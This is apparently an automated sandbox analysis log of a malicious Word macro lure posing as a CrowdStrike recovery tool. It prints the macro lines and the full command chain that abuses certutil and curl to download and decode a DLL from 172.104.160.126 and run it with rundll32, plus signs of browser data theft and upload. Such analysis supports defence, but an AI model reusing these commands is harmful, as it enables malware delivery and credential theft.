Source: curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4722Host: login.live.com
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr String found in binary or memory: http://172.104.160.
Source: rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:5000/Upl
Source: rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500205273.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2530048667.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2450955120.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461645882.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540526722.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257938197.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2490004164.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416851318.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510132228.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479710584.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:5000/Uploadss
Source: vbaProject.bin String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/pay
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/pay0
Source: curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txt-oC:
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txt6
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txt6ov
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txto
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txton
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txtr
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txts
Source: vbaProject.bin String found in binary or memory: http://172.104.160.126:80X99
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: document.xml String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://curl.se/P
Source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: V2ViIERhdGE=.16.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49325
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49268
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49325 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 16_2_00007FFD92C64B30

System Summary

Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False) Name: MainFunc
Source: ~WRC0000.tmp.26.dr OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp") Name: MainFunc
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c " Name: MainFunc
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & " Name: MainFunc
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell") Name: MainFunc
Source: ~WRC0000.tmp.26.dr OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0000.tmp.26.dr OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\rundll32.exe File deleted: C:\Windows\Temp\SGlzdG9yeQ==
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open Name: Document_Open
Source: ~WRC0000.tmp.26.dr OLE, VBA macro line: Sub Document_Open()
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.dr OLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.dr OLE indicator, VBA macros: true
Source: turabian.xsl.0.dr OLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.dr OLE indicator, VBA macros: true
Source: gostname.xsl.0.dr OLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.dr OLE indicator, VBA macros: true
Source: sist02.xsl.0.dr OLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.dr OLE indicator, VBA macros: true
Source: gb.xsl.0.dr OLE indicator, VBA macros: true
Source: iso690.xsl.0.dr OLE indicator, VBA macros: true
Source: chicago.xsl.0.dr OLE indicator, VBA macros: true
Source: gosttitle.xsl.0.dr OLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.26.dr OLE indicator, VBA macros: true
Source: ~WRC0000.tmp.26.dr OLE indicator, VBA macros: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit
Source: harvardanglia2008officeonline.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: CatalogCacheMetaData.xml.26.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_0086310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, 13_2_0086310D
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{EDECE918-A2EA-49DC-A414-445477A4F37D} - OProcSessId.dat
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, Word Document stream: true
Source: Element design set.dotx.0.dr OLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr OLE indicator, Word Document stream: true
Source: Equations.dotx.0.dr OLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.dr OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.26.dr OLE indicator, Word Document stream: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr OLE document summary: title field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr OLE document summary: author field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr OLE document summary: edited time not present or 0
Source: ~WRC0000.tmp.26.dr OLE document summary: title field not present or empty
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\xcopy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7835E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777616664.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C366000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777450961.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2778177784.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm ReversingLabs: Detection: 26%
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
